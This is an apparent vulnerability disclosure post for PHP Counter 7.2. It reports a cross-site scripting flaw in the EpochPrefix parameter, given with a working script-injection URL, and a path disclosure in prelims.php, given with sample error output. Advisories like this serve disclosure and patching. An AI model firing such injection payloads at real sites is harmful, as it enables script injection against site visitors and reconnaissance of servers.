Hi, I found two vulnerabillities in PHP Counter 7.2 PHP Counter Vendor: http://www.ekstreme.com/phplabs/phpcounter.php First an XSS problem (file phpcounterxss.txt) Second a Path disclosure vulnerabillity (file phpcounterdir.txt). greets, priestmaster Mail: <priest@xxxxxxxxxxxxxxxx> URL: http://www.priestmaster.org
---------------------------------------------------------- ---- Team priestmasters PHP Counter 7.2 XSS Advisorie ---- ---------------------------------------------------------- PHP Counter Vendor: http://www.ekstreme.com/phplabs/phpcounter.php PHP Counter 7.2 does not filter "<>" tags in EpochPrefix parameter. Cross site scripting and HTML injection is possible. Exploitation: http://www.yourwebsite.org/CounterDirectory/index.php?Plugin=All%20Hits&EpochPrefix=";></a></div><script>a=/XSS/%0aalert(a.source)</script> The injected script is called multiple times. XSS is hard to do because ' and " are filtered. greets, priestmaster URL: http://www.priestmaster.org Email: priest@xxxxxxxxxxxxxxxx
------------------------------------------------------------ -------- Team priestasters PHP Counter 7.2 Advisorie ------- ---------------- Path disclosure vulnerabillity ------------ ------------------------------------------------------------ PHP Counter Vendor: http://www.ekstreme.com/phplabs/phpcounter.php A Path disclosure vuln exist in prelims.php Exploitation is simple: http://www.yoursite.com/CounterPath/prelims.php Output look like this: Fatal error: Call to undefined function: getdawn() in /home/.sites/165/site223/web/Counter/prelims.php on line 63 That's all :-) priestmaster
